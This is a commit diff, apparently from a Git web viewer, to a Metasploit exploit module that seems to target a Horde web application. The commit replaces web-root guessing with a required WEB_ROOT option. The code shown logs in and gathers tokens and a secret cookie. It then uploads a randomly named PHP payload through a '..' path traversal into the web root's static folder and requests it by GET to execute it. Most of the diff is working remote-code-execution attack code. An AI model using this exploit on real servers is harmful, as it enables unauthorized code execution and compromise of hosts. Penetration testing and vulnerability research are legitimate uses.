Remove web root guessing since not reliable
parent
f8c5852902
commit
5c84e9e61a
|
@ -45,7 +45,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
|
||||
OptString.new('USERNAME', [true, 'The username to authenticate with']),
|
||||
OptString.new('PASSWORD', [true, 'The password to authenticate with']),
|
||||
OptString.new('WEB_ROOT', [false, 'Path to the web root'])
|
||||
OptString.new('WEB_ROOT', [true, 'Path to the web root', '/var/www/html'])
|
||||
# Appears to be '/usr/share/horde/' if installed with apt
|
||||
])
|
||||
end
|
||||
|
||||
|
@ -116,19 +117,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
vprint_good("Tokens \"#{source_token}\", \"#{form_token}\", and cookie \"#{secret_cookie}\" found.")
|
||||
|
||||
if not webroot
|
||||
webroot_paths = [
|
||||
'/var/www/html/', # If installed with PEAR
|
||||
'/usr/share/horde/' # If installed with apt
|
||||
]
|
||||
else
|
||||
webroot_paths = [ webroot ]
|
||||
end
|
||||
|
||||
for webroot_path in webroot_paths
|
||||
|
||||
payload_name = Rex::Text.rand_text_alpha_lower(10..12)
|
||||
payload_path = File.join(webroot_path, "static", "#{payload_name}.php")
|
||||
payload_path = File.join(webroot, "static", "#{payload_name}.php")
|
||||
payload_path_traversal = File.join("..", payload_path)
|
||||
|
||||
data = Rex::MIME::Message.new
|
||||
|
@ -155,15 +145,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
vprint_status("Executing the payload at #{payload_url}.")
|
||||
res = send_request_cgi(
|
||||
'uri' => payload_url,
|
||||
'method' => 'GET'
|
||||
'method' => 'GET',
|
||||
)
|
||||
|
||||
if res and res.code == 200
|
||||
register_files_for_cleanup(payload_path)
|
||||
break
|
||||
else
|
||||
vprint_bad("URL #{payload_url} hasn't been created or is not callable")
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue